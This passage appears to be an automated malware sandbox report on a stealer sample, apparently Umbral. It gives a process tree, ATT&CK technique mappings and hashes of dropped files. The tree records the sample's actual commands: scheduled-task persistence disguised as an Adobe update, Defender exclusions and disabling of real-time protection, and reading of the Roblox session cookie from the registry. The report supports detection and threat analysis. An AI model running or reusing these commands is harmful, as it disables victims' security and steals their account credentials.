        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3892
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:3548
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5920
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:3136
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5464
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5880
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1188
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2668
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5888
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1672
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5208
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:6000
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5924
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2592
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5576
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5340
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3172
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1472
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3088
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:6116
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5288
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1132
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5064
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1988
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1072
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4556
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2420
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4196
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1840
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4976
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4540
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5544
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3792
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:3576
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2288
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5900
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:60
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:3224
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5136
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:920
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4188
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:3752
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3708
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4620
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6040
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5660
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:972
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1212
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3268
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4728
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3332
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Views/modifies file attributes
      PID:3524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2316
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4012
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:428
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6136
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2728
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:2476
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2144

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1220

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec68f430dd646907595c25a337c6f032

SHA1
7fc35f368450557543feac46f3ec34cd68581811

SHA256
43b31b43ebf535cffbf983420cfc26f0cd0bb8e88b0add85383b458243a36ab5

SHA512
1ab54dd427341ca14d580736d2ec06c91abf1e1b45b5ca982f05c43c5a86a7e64684f3c3eb00f31db89f244027b450a0f5a05c9f954032c58a72f138aab05ed3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
454c5c4b128d34aee2eb765f2a9c0aa9

SHA1
4b6e92db79d964f604fd6b261b3b19ede2aea8a5

SHA256
e1e65d1697b9ac59805f677cbc8eec623a899b75b1389354f0948ad3c1513772

SHA512
17b4e146ef4f8862d06ac975204cca9ef9b077420256df92d94409715b18efb4dc63879154c1c234317a169ac63024ed43b5cb52473882dc46c588af089f25d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
5824a6037c081fda5d46de274b6e2799

SHA1
526367a09300cbde430e8fb44e41cbe7a0937aac

SHA256
4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

SHA512
a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
218KB

MD5
4915447de5b61cfdf3647360f080efc2

SHA1
c2db4084c9155f8eb2f42996b197516d6633868c

SHA256
edc8486279c293a3526c71a9c397dccd3e3d9c0c766226252d35991b4ddbf09a

SHA512
c68c0d5403a33aff6c7a96670c2db661e3cd97d80bc58325410e0bb2c51609a3ea86c184dc3bfc8a0da95fbb4119b89c8aa2f74221a35bcf3f66a149914ed13f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup.exe

Filesize
10KB

MD5
aad0d299fc82a3973c0c74e538bd5621

SHA1
6ea38c329659bdb690d9d98b0de238a6beca3297

SHA256
79e5373835035d1dcb16e9138f2f3ad2909937ca57385511c89ca288e7988965

SHA512
d16d5c3caf9c6ae42b709c8f25688c48569225966c3ddf768025565681b72efbfe0616a7ece7b53a433fabc904af6407fb0ad839636b14dc900b2660a73d7f89

Download Submit
C:\Users\Admin\AppData\Local\Temp\Result.exe

Filesize
489KB

MD5
0e91bb19fee25d517021594ba5a0362f

SHA1
7e2fd585845b1fdad31276cbd102fedbe1128779

SHA256
a94ee0dfc6a4e793b3d58b5c05daddb4ef4816ede9980dee7591889cba0cc0b9

SHA512
0c6ea7e7ca41ac6d2080ac3fc5206a2b3de946a7b20b7f9af0828462ac09f45315d3edeebb3041637ba35a991ebdb5dd721433c100a4a31e716289c19e6937e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TimerResolution.exe

Filesize
32KB

MD5
2c9017dbc6c38d2567d550177d64a81d

SHA1
f77de1de8e39c17c299c25696cc7965bfe07028f

SHA256
8a0c6871ec6e09e4193f537884111006a947d7b3e9260110907777d0c4dd68d3

SHA512
244430ea44c510b61351941cd459278e2cd7bf88750643c49b2d710139b3c71b4a35e8379d2dccbce23a15105e1b6ad6c9444875dabaefeb311a45a9a0fc580a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
229KB

MD5
81ade106b7eed372ccfd089aa4980409

SHA1
0987467ac38ba6330e370fd99b1c68e5f274c169

SHA256
dd92a068c1839fa3df94d8534d741573c06cfdfd93cef08b4e4d3091bc8e057f

SHA512
539941d93b9e1c8695478128560648c2c6d199293935f7832100c273212fc38a5e349bf3bfc6b6d08c6bab0a2cc465b3e6a56c0478ccb14d2c2d386f4e83efb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v3hzzfua.3cg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\xdwd.dll

Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
memory/3272-18-0x0000000000400000-0x0000000000487000-memory.dmp

Filesize
540KB

Download
memory/3792-54-0x00000208FDF60000-0x00000208FDF82000-memory.dmp

Filesize
136KB

Download
memory/4652-48-0x00000000009C0000-0x00000000009FC000-memory.dmp

Filesize
240KB

Download
memory/4728-78-0x0000010321F10000-0x0000010321F86000-memory.dmp

Filesize
472KB

Download
memory/4728-79-0x0000010321F90000-0x0000010321FE0000-memory.dmp

Filesize
320KB

Download
memory/4728-80-0x0000010307DE0000-0x0000010307DFE000-memory.dmp

Filesize
120KB

Download
memory/4728-52-0x0000010307780000-0x00000103077C0000-memory.dmp

Filesize
256KB

Download
memory/4728-116-0x0000010309450000-0x000001030945A000-memory.dmp

Filesize
40KB

Download
memory/4728-117-0x0000010309480000-0x0000010309492000-memory.dmp

Filesize
72KB

Download
memory/5296-53-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5840-11-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download